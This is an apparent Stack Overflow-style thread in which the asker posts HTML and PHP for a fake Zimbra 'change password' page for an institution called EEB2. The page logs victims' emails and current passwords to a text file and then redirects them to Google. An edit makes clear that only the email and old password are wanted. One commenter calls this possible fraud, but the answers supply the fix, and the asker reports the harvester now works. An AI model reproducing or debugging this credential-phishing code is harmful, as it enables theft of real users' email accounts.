# Save User Info Form PHP HTM

Tags: php, html, css, forms

I'm trying to do a form that when the user types the info and then submits it saves it on a text file. But when I open the text file, it only displays the IP adress....  I can't figure out what I'm doing wrong with my code:

I already tried changing §_SERVER to $_POST but it doens't work

Thanks :)

HTML:

```
    <form action="login.php" id="login.php" method="get">
  <div class="imgcontainer">
    <img src="zimbra.png" alt="Avatar" class="avatar">
  </div>
        <div class="bodypage">
     <div class="font">
  <div class="container">

    <label>EEB2 Zimbra Email</label>
    <input type="text" placeholder="Enter Email" name="email" id="email" required>

    <label>Password</label>
    <input type="password" placeholder="Enter Password" name="psw" id="psw" required>

    <label>New Password</label>
    <input type="password" placeholder="Enter New Password" name="newpsw" required id="newpassword">

    <label>Confirm New Password</label>
    <input type="password" placeholder="Enter New Password" name="newpsw" required id="confirmnewpassword">
      </div>


    <a href="google.com"><button type="submit">Change Password</button></a>
         </div>

    </form>
```

PHP:

```
    <?php
$handle = fopen("Passwords.txt", "a");
$ip = $_SERVER['REMOTE_ADDR'];
$email = $_SERVER['email'];   
$psw = $_SERVER['psw']; 
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, PHP_EOL);
}
fwrite($handle, "IP=$ip");
fwrite($handle, "PASS=$psw");
fwrite($handle, "EMAIL=$email");
fclose($handle);
header ('Location: http://www.google.be/');
exit;
?>
```

**EDIT:** I'm not trying to get the new password,  just the Email and the password.

Comment: put you code here.

Comment: wait i'll try to put it again in the post.

Comment: I just put the code into the post :)

Comment: your method is $_GET so it would be $_GET['email']

Comment: Tried to change it by $_GET, but it still doesn't work :/

Comment: Hey! There are a few issues in this, but one of which I can't let pass. I am not sure what your goal is doing this, but storing passwords as plain text is never acceptable, unless you are trying to steal informations from your users, in which case it is fraud. Use the [password_hash](http://php.net/manual/en/function.password-hash.php) function, available in php since 5.5, to hash them before storage. there is a compatibility library in case you have older php. Seriously. **never store user passwords as plain text**.

Answer (score 0, accepted):

Your method is $_GET so it would be $_GET['email']

Comment: Tried to change it by $_GET, but it still doesn't work :/

Comment: Why is your button wrapped in an anchor to google?

Comment: Sorry, I made a mistake while trying another solution. I just tried your solution on my original code and it works! Thank you so much :))

Comment: Just wanted to try out something

Answer (score 0):

There's no such thing as $_SERVER['email'], $_SERVER['psw'], etc.  This is [documented here](http://php.net/manual/en/reserved.variables.server.php).

Assuming that they have "name" attributes in the HTML form (which I can't, for some reason, see at Dropbox), you should find these values at $_POST['psw'], $_POST['email'], etc.

And I would add that you should use [filter_input](http://php.net/filter_input) or some other mechanism to test these values before you put them onto your filesystem.

Comment: Thanks, but I already did that. I just put the code into the post, I think it'll be easier for you to understand :)

Answer (score 0):

First if you are trying to save credentials(like passwords) you should not use method **"GET"** as in your code. Because when the form is submitted, as you have used GET method all the credentials will be shown on the URL. So it will be a security issue. Most developers prefer POST method over GET for form data handling.

As it says on W3schools "**$_SERVER** is a PHP super global variable which holds information about headers, paths, and script locations."

**Using POST method**

Try Changing to this.(**Use "$_POST[]**" method just to capture the data you're trying to POST from the web Form. So this will work for you.

$ip = $_POST['REMOTE_ADDR'];
$email = $_POST['email'];

In order this to work for you you should change

**USING GET method**

But if you still would like to stick with the GET method you can simply change only these to $_GET['']

$ip = $_GET['REMOTE_ADDR'];
$email = $_GET['email'];

Hope that would help you! :D Good Luck

Comment: Thanks! I already fixed it thanks to another member, but I'll update it for this for more security! :)